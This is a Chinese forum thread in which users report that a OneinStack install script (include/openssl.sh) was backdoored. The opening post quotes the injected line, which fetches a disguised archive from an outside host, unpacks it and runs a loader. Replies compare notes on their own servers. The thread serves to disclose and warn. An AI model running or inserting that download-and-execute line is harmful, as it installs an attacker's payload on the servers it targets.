挂马的文件在:/root/oneinstack/include/openssl.sh137行,多了一段:
- wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg && tar zxf /var/local/oneinstack.jpg -C /var/local/ && cd /var/local/cron && ./load linux@QWE
执行代码
github上 https://github.com/oneinstack/oneinstack/blob/main/include/openssl.sh 这个文件是没有这段代码的。
比对oneinstack-full.tar.gz的MD5码是不准的。要看/root/oneinstack/include/openssl.sh 这个文件,不知道黑客会不会留后门清理入侵痕迹,我另外一台几个月前搭建的这个文件没有这串代码。
热议
2楼 5ean 9小时前
看了一下,是真的,我去,我的服务器用的都是oneinstack,检查了一下没有这句
应该是刚被挂上马
3楼 klocal 9小时前
说好的 不用面板 最安全呢?
4楼 5ean 9小时前
说好的 不用面板 最安全呢?
谁能想到源码被黑,挂上马呢,以后不敢用oneinstack了
5楼 七夏浅笑 9小时前
感觉用啥都有不安全的时候,不过还是用大佬都用的东西好,出问题了能及时被人发现
6楼 Xhvai110 9小时前
泰裤辣
7楼 燕十三丶 9小时前
一直用lnmp
8楼 5ean 9小时前
一直用lnmp
还军哥靠谱,稳这么多年了
9楼 bios12567496 9小时前
看了下 我1月份配置的 没有这代码
10楼 jhsyue 7小时前
我上个月配的 也没这串代码
我是4月21号下午暗桩的 刚才看了下 没有这串代码
申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。